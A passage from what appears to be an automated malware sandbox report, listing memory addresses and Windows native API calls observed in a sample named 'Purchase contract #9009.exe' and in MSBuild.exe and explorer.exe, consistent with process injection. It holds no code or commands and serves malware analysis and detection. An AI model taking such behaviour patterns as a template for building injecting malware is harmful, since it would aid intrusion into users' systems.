          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 4_2_015E9770 NtSetInformationFile
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 4_2_015EA770 NtOpenThread
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 4_2_015E9760 NtOpenProcess
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 4_2_015EA710 NtOpenProcessToken
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 4_2_015E9730 NtQueryVirtualMemory
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 4_2_015E9650 NtQueryValueKey
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 4_2_015E9670 NtQueryInformationProcess
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 4_2_015E9610 NtEnumerateValueKey
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 4_2_015E96D0 NtCreateKey
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_04B395D0 NtClose,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_04B39540 NtReadFile,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_04B396E0 NtFreeVirtualMemory,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_04B396D0 NtCreateKey,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_04B39660 NtAllocateVirtualMemory,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_04B39650 NtQueryValueKey,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_04B39780 NtMapViewOfSection,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_04B39FE0 NtCreateMutant,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_04B39710 NtQueryInformationToken,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_04B39860 NtQuerySystemInformation,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_04B39840 NtDelayExecution,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_04B399A0 NtCreateSection,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_04B39910 NtAdjustPrivilegesToken,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_04B39A50 NtCreateFile,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_04B395F0 NtQueryInformationFile
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_04B3AD30 NtSetContextThread
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_04B39520 NtWaitForSingleObject
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_04B39560 NtWriteFile
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_04B39610 NtEnumerateValueKey
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_04B39670 NtQueryInformationProcess
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_04B397A0 NtUnmapViewOfSection
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_04B39730 NtQueryVirtualMemory
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_04B3A710 NtOpenProcessToken
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_04B3A770 NtOpenThread
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_04B39770 NtSetInformationFile
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_04B39760 NtOpenProcess
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_04B398A0 NtWriteVirtualMemory
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_04B398F0 NtReadVirtualMemory
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_04B39820 NtEnumerateKey
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_04B3B040 NtSuspendThread
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_04B399D0 NtCreateProcessEx
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_04B39950 NtQueueApcThread
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_04B39A80 NtOpenDirectoryObject
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_04B39A20 NtResumeThread
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_04B39A10 NtQuerySection
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_04B39A00 NtProtectVirtualMemory
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_04B3A3B0 NtGetContextThread
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_04B39B00 NtSetValueKey
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_02EB82F0 NtClose
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_02EB8270 NtReadFile
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_02EB83A0 NtAllocateVirtualMemory
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_02EB81C0 NtCreateFile
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_02EB82EA NtClose
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_02EB826C NtReadFile
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_02EB8215 NtCreateFile
          Source: C:\Users\user\Desktop\Purchase contract #9009.exe | Code function: 1_2_0010B673
          Source: C:\Users\user\Desktop\Purchase contract #9009.exe | Code function: 1_2_00BDC27C
          Source: C:\Users\user\Desktop\Purchase contract #9009.exe | Code function: 1_2_00BDEC58
          Source: C:\Users\user\Desktop\Purchase contract #9009.exe | Code function: 1_2_00BDEC48
          Source: C:\Users\user\Desktop\Purchase contract #9009.exe | Code function: 1_2_046604F8
          Source: C:\Users\user\Desktop\Purchase contract #9009.exe | Code function: 1_2_046631C9
          Source: C:\Users\user\Desktop\Purchase contract #9009.exe | Code function: 1_2_04660B48
          Source: C:\Users\user\Desktop\Purchase contract #9009.exe | Code function: 1_2_046604E8
          Source: C:\Users\user\Desktop\Purchase contract #9009.exe | Code function: 1_2_04661600
          Source: C:\Users\user\Desktop\Purchase contract #9009.exe | Code function: 1_2_04661C05
          Source: C:\Users\user\Desktop\Purchase contract #9009.exe | Code function: 1_2_04660EF1
          Source: C:\Users\user\Desktop\Purchase contract #9009.exe | Code function: 1_2_04660F00
          Source: C:\Users\user\Desktop\Purchase contract #9009.exe | Code function: 1_2_046619F1
          Source: C:\Users\user\Desktop\Purchase contract #9009.exe | Code function: 1_2_04660B39
          Source: C:\Users\user\Desktop\Purchase contract #9009.exe | Code function: 1_2_04661BAF
          Source: C:\Users\user\Desktop\Purchase contract #9009.exe | Code function: 1_2_0010B6C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 4_2_00401030
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 4_2_0041B909
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 4_2_00408C60
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 4_2_00408C64
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 4_2_00402D88
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 4_2_00402D90
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 4_2_0041CE65
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 4_2_00402FB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 4_2_015AF900
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 4_2_015C4120
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 4_2_0167E824
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 4_2_01661002
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 4_2_016728EC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 4_2_015BB090
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_016720A84_2_016720A8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015D20A04_2_015D20A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015CAB404_2_015CAB40
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_01672B284_2_01672B28
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_0166DBD24_2_0166DBD2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_016603DA4_2_016603DA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015DEBB04_2_015DEBB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_0165FA2B4_2_0165FA2B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_016722AE4_2_016722AE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_01671D554_2_01671D55
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_01672D074_2_01672D07
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015A0D204_2_015A0D20
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_016725DD4_2_016725DD
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015BD5E04_2_015BD5E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015D25814_2_015D2581
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_0166D4664_2_0166D466
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015B841F4_2_015B841F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_01671FF14_2_01671FF1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_0167DFCE4_2_0167DFCE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015C6E304_2_015C6E30
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_0166D6164_2_0166D616
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_01672EF74_2_01672EF7
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04BB44969_2_04BB4496
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B0841F9_2_04B0841F
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04BBD4669_2_04BBD466
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B225819_2_04B22581
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04BB2D829_2_04BB2D82
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B0D5E09_2_04B0D5E0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04BC25DD9_2_04BC25DD
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AF0D209_2_04AF0D20
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04BC2D079_2_04BC2D07
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04BC1D559_2_04BC1D55
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04BC2EF79_2_04BC2EF7
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B16E309_2_04B16E30
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04BBD6169_2_04BBD616
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04BC1FF1